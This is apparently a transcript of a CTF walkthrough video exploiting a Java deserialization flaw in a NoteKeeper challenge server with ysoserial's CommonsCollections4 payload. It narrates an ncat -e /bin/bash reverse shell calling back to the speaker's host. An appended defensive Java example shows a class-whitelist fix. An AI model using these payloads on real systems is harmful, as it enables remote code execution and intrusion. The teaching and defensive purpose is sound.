What's going on everybody? My name is John Hammond, and welcome back to the All Army CyberStakes, or ACI CTF, video. I want to be showcasing one of the challenges from the binary exploitation category that didn't have a whole lot of solves. This is Serial Killer, for a hundred points in the binex category; it currently only has 39 solves. It's Saturday and the game ends tomorrow night, so we'll see if that gets any more. But this is called Serial Killer, "challenge source". We're given the source code here, so let's download that. I'm gonna go ahead and make a directory for me to work with in this. I will hop over to the ACI directory that I've been working with and I'll create a directory called serial killer. We can go put that in there and wget that file down. Okay. It's also listening on this challenge host and port. Okay, we can also connect with this little client. Let's wget that down as well. Okay.

So if I were to java -jar that NoteKeeper client, because it is a jar file, I'm assuming this is all written in Java. We can go ahead and connect to that host on that port; it needs those as arguments, so I'll supply that host and I'll also supply that port. There we go: connecting to the server, connected. "Welcome to the NoteKeeper client, version 1.42." We could print all the notes, add a new note, and exit this program. Okay, I will view the notes. We have "test: this is the main content", "shopping list: milk, eggs and sausage", "bills: don't forget to pay the bills, due on the 11th". Interesting. If I add a new note, can I say "please subscribe, body like comment YouTube algorithm"? Good enough, and let's print all the notes. There we go, now I have my note in there. Okay, that seems to be all the functionality this program is willing to give me, so let's take a look at the source code. Let's unzip that Serial Killer source.
I have the client, Note, and server. So let's take a look at the client and see what that was doing. Importing all these Java classes: IOException, ObjectInputStream and ObjectOutputStream. That's kind of peculiar. It's the local host IP address; you can just supply that. Read in the arguments as specified, read in every line, connect to the server, connected, good, good, good, and it will display these out to me. So it will create a new ObjectInputStream, a new ObjectOutputStream. If we supply some of these things, it will include a "get". Interesting. And it will have that banner displayed and read all those out. Same thing if you wanted to create things on it; it will save as needed. Okay. Interesting.

Let's take a look at our server. java.util.ArrayList, ObjectInputStream, ObjectOutputStream as usual, ServerSocket, System, and Commons Collections 4, CollectionUtils. That's peculiar. All the notes that are in there by default: it adds these, and then the server loop will read in input with ObjectInputStream. This plays out, so it'll only write objects if they include that "get" or "save" prefix. But we could just very easily netcat to it and send that ourselves, could we not? We don't need to use that client. Let's try that. It's not going to send us any banner or anything. "Hello." Okay, that makes it die. If I send that as a string, does it exit properly? No: "get", no, StreamCorruptedException, invalid stream header, at ObjectInputStream. Okay, so it's using ObjectInputStream to read that in, and ObjectInputStream is kind of like a known bad Java deserialization issue, right? Java deserialization, ObjectInputStream, that's a thing. Yeah, deserialization of untrusted data. OWASP has a good article on it: Java ObjectInputStream, most likely to be seen in custom code, reads an object from an untrusted source and casts it to an object, AcmeObject. Occurs after the deserialization process ends.
It's not preventing anything. Okay, so ObjectInputStream is going to deserialize something, and whatever we send it, right, that's happening based off of just our raw input. So if we're trying to attack this with the Java deserialization attack, and the challenge is called Serial Killer, right, we shouldn't need to care about this whole client if we just want to send it a payload. We could use ysoserial to be able to do this. So if you haven't heard of ysoserial, it's a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. I've used this a bit for Java RMI attacks, and it has a bunch of payload types based off of anything that we might already notice. And in fact, because we found Commons Collections 4, CommonsCollections4 is an option in here, and maybe we could go ahead and beat this thing up. They use java -jar with ysoserial to be able to actually get a payload in here. If you want to send a payload, like a Java RMI exploit, you can use java -cp. So let's generate a payload and try and send it, right? We could very well just download this. They have releases here. Yeah, can I download that zip? ysoserial 0.0.5, is that the latest? I guess that's the latest. Let's try it. Let's get to our shell. Let's wget that guy down, slap that in there, unzip that 0.0.5. A lot of ysoserial in there. Do I have ysoserial.jar? No. Oh, source, source. There's got to be some releases that actually have the binary. They have an installation: download the latest from JitPack. Gotcha. There we go. Okay, that's what I actually want. Let's go ahead and grab him, copy link location. Let's clear out that ysoserial source and the 0.0.5, because we don't need that; we just want the jar file. It'll take a little bit of time to pull that down, but we could see if we could get code execution, maybe see it connect back to us, because this is out living in the outside internet.
Let's create a little droplet. John, password, good, good, good. Now we have that ysoserial-master here. Can I run that ysoserial? Yes. Okay, so it'll tell me all the options that are available, and according to the syntax we can specify the payload type that we want. We know that we're gonna be up against CommonsCollections4, so we could certainly try that. Let's use CommonsCollections4, and it needs what we want to run after it. So let's try to netcat, or, like, ping at the very least, johnhammond.org. Will that work? Why did that not work? master-SNAPSHOT. Does that make a payload? Let's try that, go to a payload. That doesn't seem to work; payload is now an empty file. Okay, are there other versions of this? Because master, I always have an issue with master-SNAPSHOT, master. Try and get me multi-arg. Does that one work, multi-arg? That's a thing. Let's get that guy in there. Okay, now we have the multi-arg jar. Is that a file I can download? Yes, it is. Maybe multi-arg will behave. I always struggle with ysoserial stuff. Now we're downloading multi-arg. Let's try and listen for pings. So sudo tcpdump -i, or just, I don't care, icmp, search for any pings that I get. tcpdump, not tcdump. There we go. Just as a sanity check, let me ping myself. Good, we see it. Okay. Oh, nope, didn't mean to close that. Now that we have multi-arg, let's try and java -jar that one, see if he behaves. I need the CommonsCollections4. Did I just have that, like, spelt wrong or something? Commons Collections, I must have had that wrong. Yeah, that's probably exactly why it didn't work. Or not, who cares? Let's just use multi-arg with CommonsCollections4 and let's say ping. Okay, cool. Now it's gonna try and do stuff. So ping johnhammond.org. That gave us some raw bytes, so we can redirect that as a payload. Great.
So now hexedit payload. Payload is a serialized Java object that can be abused, and because it's using that Commons Collections 4, according to our server source code, and using that input stream to read it in, it will go ahead and actually deserialize it. So let's try to netcat back to that guy as we had before, but let's cat that payload in and see if he's gonna ping. Nope, seemingly not. Okay. What else could we do? Let me check the hints here. Honestly, let me be transparent here. "You need to run the client with Java." Yeah, we knew that. "Use the client to connect to the server." "Java 8." "Make sure you read the source." And "ncat is installed on the target machine." Oh, okay. Can we ncat johnhammond.org on 8888? So let's listen: ncat 8888, send that in, and we get a connection. Okay, awesome. Okay, so we do have code execution. Maybe ping was just a bad call. Regular netcat doesn't seem to just straight work, does it? Oh, it does. Well, that would work just fine then. Well, if we have ncat we could use the -e and get, like, a shell, /bin/bash. And let's listen one more time, get that to call back and spit it over there. There we go: id. Nice. Okay, that's code execution. Excellent. So let's go ahead and do that one last time just so you can get the shell and see clearly that flag.txt. There we go. So that's all that you needed to do. I always struggle with ysoserial.
I don't know why; it's very, very sensitive, and using, like, double quotes or quotes around the command that you're trying to run makes it misbehave. So I haven't seen that work. Maybe that will work now that I've just been talking about it, but let's spin that one more time. No, it will fail if you have quotes in there, even for multi-arg. And I know that there are, like, two different representations between using multi-arg and using master, so if I were to switch this to go run with the master version of ysoserial, it just doesn't take that at all. Maybe I could use quotes in here, and that seemed to have errored, but payload is still empty. So that doesn't work whatsoever either. So the syntax that I ended up using was using the multi-arg version of ysoserial, using CommonsCollections4, because we knew that was in the source code and that's what it's using, and using ncat without quotes to be able to actually get the code execution in there, and redirecting it to a payload file. ls: payload is in there now with contents, so I could send that payload file over to the challenge itself. It will deserialize it instantly upon getting that, and I could run commands and find out who I am and cat that flag. So that's that challenge. I don't know, a lot of people haven't solved it, and I guess I, because of struggling with ysoserial, I hate dealing with that in Java, but that is that challenge. So that's all that I kind of wanted to showcase. I've used ysoserial a bit before for Java RMI attacks, but it's kind of a well-known thing, especially if you're doing some serialization and deserialization; ysoserial is just the go-to, especially for Java. So thank you guys so much for watching. If you guys liked this video, please do press that like button. If you'd be willing, leave a comment, maybe some constructive criticism: "Hey John, this video sucked, stop doing them." It wouldn't faze me.
I probably would just keep doing videos, but subscribe if you're willing. I'd be so, so grateful. If you want to support the channel in other ways, there is a Patreon and PayPal link in the description. Thank you. Love to see you on the Discord server, also link in description. It'd be great to see you on Instagram for some reason, PayPal as I said, Twitter, LinkedIn. Twitter and LinkedIn I'm trying to grow; I'm trying to get a lot more Twitter stuff, and it'd be great to see you guys on LinkedIn because we're doing good stuff here. Thanks for watching everybody. I will see you in the next video. Take care.
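Added example (an editor's illustration, not code from the challenge source, the video, or ysoserial): the vulnerable pattern the video finds in the server, a raw ObjectInputStream.readObject() on whatever arrives over the socket, placed beside a hardened reader that whitelists classes in resolveClass(). Everything here is assumption where it goes beyond the transcript: the NoteKeeper protocol is taken to exchange only java.lang.String commands like "get", and a plain ArrayList stands in for the attacker's object, since no Commons Collections gadget chain is bundled.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class DeserializationDemo {

    // Vulnerable pattern, as the video describes the challenge's server loop: bytes from
    // the socket go straight into readObject(). A ysoserial gadget chain executes inside
    // readObject(), so the later "does the string start with get/save" check never runs.
    static Object readUntrusted(InputStream in) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(in)) {
            return ois.readObject();
        }
    }

    // Hardened variant: a look-ahead class whitelist in resolveClass(). It is consulted
    // when the class descriptor is read, before the object is instantiated and before any
    // readObject()/readResolve() gadget code can run. This works on Java 8 (the hints say
    // the target runs Java 8); on Java 9+ the built-in ObjectInputFilter (JEP 290) does
    // the same job declaratively.
    static final class SafeObjectInputStream extends ObjectInputStream {
        // Assumption: the protocol only ever carries Strings. If the real server also
        // receives its Note class, add that fully-qualified class name here.
        private static final Set<String> ALLOWED =
                new HashSet<>(Arrays.asList("java.lang.String"));

        SafeObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "not on deserialization whitelist");
            }
            return super.resolveClass(desc);
        }
    }

    static Object readFiltered(InputStream in) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new SafeObjectInputStream(in)) {
            return ois.readObject();
        }
    }

    // Serialize the way the client does, giving realistic bytes that begin with the
    // AC ED 00 05 stream header the server demanded when plain text was sent to it.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Legitimate client traffic: a "get" command as a String. Both readers accept it
        // (a serialized String is TC_STRING, so resolveClass() is never even consulted).
        byte[] legit = serialize("get");
        System.out.println("vulnerable reader: " + readUntrusted(new ByteArrayInputStream(legit)));
        System.out.println("filtered reader:   " + readFiltered(new ByteArrayInputStream(legit)));

        // Constructed stand-in for an attacker-supplied object. A real payload would be a
        // CommonsCollections4 gadget chain; the vulnerable reader reconstructs whatever it
        // is given, while the filtered reader rejects it at the class descriptor.
        byte[] hostile = serialize(new ArrayList<>(Arrays.asList("not", "a", "string")));
        System.out.println("vulnerable reader: " + readUntrusted(new ByteArrayInputStream(hostile)));
        try {
            readFiltered(new ByteArrayInputStream(hostile));
        } catch (InvalidClassException e) {
            System.out.println("filtered reader rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac DeserializationDemo.java && java DeserializationDemo`. The point of putting the check in resolveClass() rather than after the cast is the one the transcript's OWASP quote makes: the cast happens after deserialization ends, which is too late, because the gadget chain has already run.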